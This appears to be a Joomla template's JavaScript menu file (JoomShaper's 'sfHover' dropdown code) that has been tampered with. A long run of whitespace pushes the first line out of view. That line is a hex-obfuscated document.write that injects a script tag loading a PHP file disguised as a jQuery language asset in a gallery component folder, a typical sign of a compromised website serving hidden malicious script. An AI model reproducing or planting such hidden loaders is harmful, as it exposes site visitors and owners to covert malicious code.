																																																																							document.write("\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x75\x31\x2F\x63\x6F\x6D\x70\x6F\x6E\x65\x6E\x74\x73\x2F\x63\x6F\x6D\x5F\x70\x68\x6F\x63\x61\x67\x61\x6C\x6C\x65\x72\x79\x2F\x61\x73\x73\x65\x74\x73\x2F\x6A\x73\x2F\x73\x68\x61\x64\x6F\x77\x62\x6F\x78\x2F\x73\x72\x63\x2F\x6C\x61\x6E\x67\x2F\x6A\x71\x75\x65\x72\x79\x2E\x61\x6A\x61\x78\x46\x6F\x72\x6D\x2E\x70\x68\x70\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");/*------------------------------------------------------------------------
# author    JoomShaper http://www.joomshaper.com
# copyright Copyright (C) 2010 JoomShaper.com. All Rights Reserved.
# @license - Copyrighted Commercial Software
# Websites: http://www.joomshaper.com - http://www.joomxpert.com
# This file may not be redistributed in whole or significant part
-------------------------------------------------------------------------*/
sfHover=function(){var b=document.getElementById("hornav").getElementsByTagName("li");for(var a=0;a<b.length;++a){b[a].onmouseover=function(){if(this.hasChildNodes()&&this.parentNode.className!="menu"){var d=this.childNodes;for(var c=0;c<d.length;c++){if(d[c].nodeName.toLowerCase()=="ul"){d[c].style.marginTop="-"+this.clientHeight+"px"}}}this.className+="sfhover"};b[a].onmouseout=function(){if(this.hasChildNodes()&&this.parentNode.className!="menu"){var d=this.childNodes;for(var c=0;c<d.length;c++){if(d[c].nodeName.toLowerCase()=="ul"){d[c].style.marginTop="0"}}}this.className=this.className.replace(new RegExp("sfhover\\b"),"")}}};if(window.addEventListener){window.addEventListener("load",sfHover,false)}else{if(window.attachEvent){window.attachEvent("onload",sfHover)}};
